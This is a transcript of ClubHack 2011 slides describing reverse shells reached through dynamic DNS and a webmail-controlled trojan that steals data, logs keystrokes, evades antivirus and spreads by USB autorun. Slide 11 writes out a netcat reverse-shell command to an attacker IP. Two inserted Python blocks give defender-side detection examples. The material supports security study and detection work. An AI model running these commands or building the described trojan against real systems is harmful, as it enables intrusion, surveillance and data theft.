Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
ClubHack 2011 Hacking and Security Conference.
Talk - Handle Explotion of Remote System Without Being Online
Speaker - Merchant Bhaumik

Transcript

  • 1. Handle Exploitation of Remote System Without Being Online!! By Merchant Bhaumik
  • 2. Who Am I?
      • Currently helping local law enforcement and helping to secure some government websites
      • Developer of IND 360 Intrusion Detection System (host-based as well as network-based detection)
      • Communicating with the Metasploit guys to develop a term called "Universal Payload"
  • 3. Presentation Flow
      • Reverse shell using dynamic-DNS concepts
      • Getting data from the victim computer using an email tool
  • 4. We will understand this mechanism by considering one scenario.
  • 5. Jack's Situation: Jack works in a company in which all computers are behind the NAT box, and he has just decided to break one of the systems in his office and get a shell from the office to his home computer.
  • 6. Problems for Jack
      • The company has a NIDS/IPS (network IDS), so no inbound connections.
      • He doesn't know what IP address is allocated by his ISP.
      • He can't use any mechanism which constantly sends some outbound traffic.
  • 7. Good Thing for Jack: Jack's office allows him to access his Gmail account and allows some outbound traffic.
  • 8. I. #include <REVERSE SHELL>
  • 9. Why Reverse Shell?
      • A reverse shell is one of the powerful methods for bypassing network intrusion detection systems, firewalls (most of them), etc.
      • Because some of these network intrusion detection systems only monitor inbound connections, not outbound.
      • Jack has a DMZ network in his office.
  • 10. Diagram 1 (network diagram image): DMZ hosts 192.168.1.1 to 192.168.1.5 behind the public IP 117.254.4.123; individual IP 49.24.3.12; Internet.
  • 11. Diagram 2 (Normal Attack!): the same network, with 49.24.3.12 as the attacker IP and 117.254.4.123 as the public IP.
      • Step I: start a handler on port 4343: nc -l -p 4343
      • Step II (victim): nc 49.24.3.12 4343 -e cmd.exe
  • 12. Normal Flow of Getting a Reverse Shell (flowchart): Exploit! The attacker starts a handler for the reverse shell scenario; vulnerability injection and all that; the victim sends a reverse shell to the attacker machine; attacker wins!
  • 13. But What's Wrong with Jack? He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).
  • 14. Solution: the attacker is "offline" but still he will get the reverse shell.
  • 15. My Way (flowchart): Exploit! The attacker starts a handler (starting the handler on the local machine is optional!); vulnerability injection and all that; the victim sends a reverse shell to the attacker machine; attacker wins!
  • 16. Flow of Execution (flowchart): the attack exe is running in the victim machine and checks "Update IP?". No: keep running. Yes: the attacker receives the reverse shell. * If the attacker is not online, the exe is still up and running in the remote machine, and if the attacker updates the DNS records, the reverse shell is on the attacker's desk!
  • 17. Mechanism
      • If the code (first part) receives a positive acknowledgement of the packets it sends, Jack will get the reverse shell.
      • Else it keeps running in the victim machine and waits for an ack from the attacker's machine.
  • 18. Dynamic DNS Way (Initially!)
      • First part: catchme.dyndns-ip.com (255.255.255.255)
      • Second part: payload.dyndns-ip.com (255.255.255.255)
      • The new final exe (New.exe) consists of the first part and the second part, executed synchronously in a single exe.
  • 19. Dynamic DNS Way (Finally!)
      • First part: catchme.dyndns-ip.com (127.0.0.1)
      • Second part: payload.dyndns-ip.com (attacker's IP)
      • The new final exe (New.exe) consists of the first part and the second part, executed synchronously in a single exe.
  • 20. Metasploit!!!!
      • You can embed my method (or my exe) with the Metasploit payload of your choice.
      • The structure of the new exe will be as follows: the new final exe (New.exe) consists of my tool and the MSF payload (LHOST = dynamic), executed synchronously in a single exe.
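A defender-side check for the polling mechanism of slides 16 to 19, added here as an example and not the speaker's code: it scans resolver log lines for a host that repeatedly resolves a dynamic-DNS name to the "wait" sentinel (255.255.255.255) and then sees the same record flip to a routable address. The log line format, the dyndns-ip.com suffix list and the sample lines are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed resolver log: "<time> <client> <qname> <answer>", one answer per line.
SAMPLE_LOG = """\
09:00:01 192.168.1.3 www.example.com 93.184.216.34
09:00:05 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
09:00:05 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
09:05:05 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
09:05:05 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
09:10:05 192.168.1.3 catchme.dyndns-ip.com 127.0.0.1
09:10:05 192.168.1.3 payload.dyndns-ip.com 49.24.3.12
09:11:00 192.168.1.4 mail.example.com 203.0.113.5
"""

# Dynamic-DNS zones to watch (assumption). The slides use dyndns-ip.com; extend per environment.
DYNDNS_SUFFIXES = (".dyndns-ip.com",)

def is_sentinel(addr):
    """Answers no real public service publishes: the talk's 'wait' and 'go' markers."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_unspecified or addr == "255.255.255.255"

def parse(log_text):
    for line in log_text.splitlines():
        ts, client, qname, answer = line.split()
        yield ts, client, qname.lower(), answer

def detect(log_text, min_polls=2):
    """Return (client, qname, reason) alerts for the sentinel-polling pattern."""
    history = defaultdict(list)          # (client, qname) -> [(time, answer), ...]
    for ts, client, qname, answer in parse(log_text):
        if qname.endswith(DYNDNS_SUFFIXES):
            history[(client, qname)].append((ts, answer))
    alerts = []
    for (client, qname), answers in history.items():
        # Repeated sentinel answers: the implant is polling while the operator is offline.
        polls = sum(1 for _, a in answers if is_sentinel(a))
        if polls >= min_polls:
            alerts.append((client, qname, f"{polls} sentinel answers"))
        # A sentinel followed by a routable address: the record was updated, shell goes outbound now.
        seen_sentinel = False
        for _, a in answers:
            if is_sentinel(a):
                seen_sentinel = True
            elif seen_sentinel and ipaddress.ip_address(a).is_global:
                alerts.append((client, qname, f"flipped to {a}"))
                break
    return alerts
```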
  • 21. Hands-On Network (network diagram image, the same as Diagram 1): DMZ hosts 192.168.1.1 to 192.168.1.5 behind the public IP 117.254.4.123; individual IP 49.24.3.12; Internet.
  • 22. Time to Enjoy Cooked Cookies and Recipes!!
  • 23. Demo
  • 24. II. #include <EMAIL TOOL>
  • 25. Normal Remote Trojans & Viruses: Attacker (must be online!) <-> Victim (must be online!)
  • 26. My Tool!! Caution: no need to be online!! Attacker (may or may not be online!!) <-> Victim (may or may not be online!!)
  • 27. So, How Does It Work? Attacker <-> Zombie <-> Victim
  • 28. But Who Is the Zombie? It may be one of the below (images on the slide): one like this, or one like this, or like this.
  • 29. Features!!
      • Execute operating-system-level commands by using emails!
      • Get all network card information with allocated IP addresses!
      • Live tracking of the system being used by the victim!
      • Get the list of all available accounts!
      • Enable/disable key logger!
      • All this stuff with Gmail, Yahoo, Hotmail!!
  • 30. About It! It is a simple application which, once up and going on the victim's computer, the attacker can handle using the Gmail, Yahoo or Hotmail email services. There is no need for the attacker to be online to attack the victim system. The attacker has to send attack instructions to any of the mail services, and then it is like sitting at the door and watching the event, "when it's gonna open!!" As the victim connects to the internet, the attack launches and the results are automatically sent back to the attacker's email address.
  • 31. Cool Benefits!!
      • If the email account is used via one of the below (image on the slide), then it is totally anti-forensic! No reverse detection is possible!
      • Create a unique password for each individual victim who is infected.
      • Ability to handle multiple clients simultaneously.
      • Delete files on the victim's computer by simply sending an email.
      • No antivirus can detect the attack because of HTTPS.
  • 32. Tool Syntax: Password_For_Victim ":" Task_Commands ":" E.g. Pwd$98$ : Account_info : where "Pwd$98$" is the password for the particular victim, and "Account_info" is the command which sends back an email containing the account info on the victim computer!
  • 33. Snapshot 1 (Load Attack Instructions; screenshot): password for the individual victim; send account info of the victim; send drive info of the victim; send MAC and network card info.
  • 34. Snapshot 2 (Get Back Attack Result; screenshot): attached info of the victim's computer, as per the attacker's choice, in my email account!
  • 35. Why Gmail??
  • 36. No Fear of Detection 1: no direct connection between attacker and victim (Attacker <-> Victim).
  • 37. No Fear of Detection 2: no virus detection due to HTTPS. No digital signatures!! Ability to destruct itself!
  • 38. How to Spread This Code??
      • Autorun.inf via USB drives
      • Physical access to the victim's system
      • During Metasploit exploitation
  • 39. Further Possible Development!! This code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans by using this code. Anyone can send exploits, trojans, rootkits or backdoors by simply attaching them to an email and sending it to his own account, or to the account that is configured in the victim's code.
  • 40. Pros and Cons 1! (Be Transparent!!)
      • The advantage is that the attacker is never going to get caught if he/she uses a browser like TOR, Anonymizer, VPNs or any proxy for accessing the attacking Gmail account.
      • No antivirus can detect the instruction data because all traffic is going to come over HTTPS!
      • Only a single Gmail account is going to be used for both sides. The attacker and victim machines are both going to connect to the same account, but the attacker knows and the victim doesn't!!
  • 41. Pros and Cons 2: The disadvantage is that if the victim has the habit of checking the current connections using commands like 'netstat -n', then there is a possibility of detecting the Gmail connection when actually there is no browser activity. But it is still difficult to detect, because the process is running in hidden mode.
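The connection check slide 41 concedes, written out as an added defender-side example (not the speaker's tool): it reads a simplified netstat-style listing that includes the owning process (as `netstat -b` on Windows shows) and flags established sessions to mail-provider hosts owned by a process that is not a browser or mail client. The line format, the sample lines, the host suffixes and the process allow-list are constructed assumptions.

```python
from typing import List, Tuple

# Constructed listing: "<proto> <local> <remote> <state> <pid> <process>" per line,
# with remote hosts already resolved to names. "updsvc.exe" is a made-up name
# standing in for the hidden process slide 41 mentions.
SAMPLE_NETSTAT = """\
TCP 192.168.1.3:51020 imap.gmail.com:993 ESTABLISHED 4120 updsvc.exe
TCP 192.168.1.3:51021 mail.google.com:443 ESTABLISHED 4120 updsvc.exe
TCP 192.168.1.3:51030 update.example.com:443 ESTABLISHED 880 updater.exe
TCP 192.168.1.3:51044 mail.yahoo.com:443 TIME_WAIT 0 -
"""

# Providers slide 29 names (Gmail, Yahoo, Hotmail); the suffix list is an assumption.
MAIL_SUFFIXES = ("gmail.com", "mail.google.com", "mail.yahoo.com",
                 "hotmail.com", "live.com", "outlook.com")
# Processes expected to hold mail sessions on a workstation; tune per environment.
MAIL_CAPABLE = {"chrome.exe", "firefox.exe", "iexplore.exe",
                "outlook.exe", "thunderbird.exe"}

def is_mail_host(host: str) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in MAIL_SUFFIXES)

def parse_connections(text: str):
    """Yield one dict per connection line; PID 0 with '-' means no owner is shown."""
    for line in text.splitlines():
        proto, local, remote, state, pid, proc = line.split()
        host, _, port = remote.rpartition(":")
        yield {"proto": proto, "host": host, "port": int(port),
               "state": state, "pid": int(pid), "proc": proc.lower()}

def suspicious_mail_sessions(text: str) -> List[Tuple[int, str, str]]:
    """Live mail-provider sessions not owned by a browser or mail client.

    A hidden process still owns its socket, so the process column exposes it
    even when no browser window is open, which is the gap slide 41 describes.
    """
    alerts = []
    for c in parse_connections(text):
        if c["state"] != "ESTABLISHED" or not is_mail_host(c["host"]):
            continue
        if c["proc"] not in MAIL_CAPABLE:
            alerts.append((c["pid"], c["proc"], c["host"]))
    return alerts
```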
  • 42. Hands-On Time! (Demo)
  • 43. For More: backdoor.security@gmail.com
  • 44. Thanks Guys for Checking It Out!
